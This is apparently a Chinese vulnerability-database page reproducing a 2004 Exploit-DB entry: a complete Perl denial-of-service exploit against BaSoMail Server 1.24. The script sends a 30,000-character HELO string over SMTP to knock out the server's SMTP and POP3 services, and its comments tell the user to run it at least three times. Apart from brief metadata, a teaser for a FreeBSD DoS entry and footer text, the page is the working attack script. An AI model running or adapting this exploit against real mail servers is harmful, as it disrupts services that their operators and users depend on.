BaSoMail Server 1.24 – POP3/SMTP Remote Denial of Service

BaSoMail Server 1.24 – POP3/SMTP Remote Denial of Service

漏洞ID 1054725 漏洞类型
发布时间 2004-10-24 更新时间 2004-10-24
图片[1]-BaSoMail Server 1.24 – POP3/SMTP Remote Denial of Service-安全小百科CVE编号 N/A
图片[2]-BaSoMail Server 1.24 – POP3/SMTP Remote Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/594
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl


###############################################
#  BaSoMail Server POP3 and SMTP v1.24 D.o.S  #	
#  Discovered by Ziv Kamir,exploited by KaGra #
#					      #
#  This Sploit sends as HELO request 1 packet #
#  of 30K of data.If U use it at least 3 times#
#   SMTP and POP services will be D.o.Sed.    #
#     	 Tested in WinXP SP1 EnGlish	      #	
###############################################




use Net::SMTP;
print "n[*]BuiLDinG BuFfer...n";
$evil = 'A'x30000   ;

print "[*]@@@...SenDing DeViL...HeLL UnleaSheD...wait at least 30 seconds...@@@n";

$smtp = Net::SMTP->new('localhost',
			Hello=>$evil,
			Timeout=>30,
			
			);

print "nTarGet Has BeeN D.o.Sed,use Exploit at Least 3 times n";
print "and then check if Server aLiVe!nn";

# milw0rm.com [2004-10-24]

相关推荐: FreeBSD Accept Filter Denial of Service Vulnerability

FreeBSD Accept Filter Denial of Service Vulnerability 漏洞ID 1101999 漏洞类型 Design Error 发布时间 2002-05-29 更新时间 2002-05-29 CVE编号 N/A CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享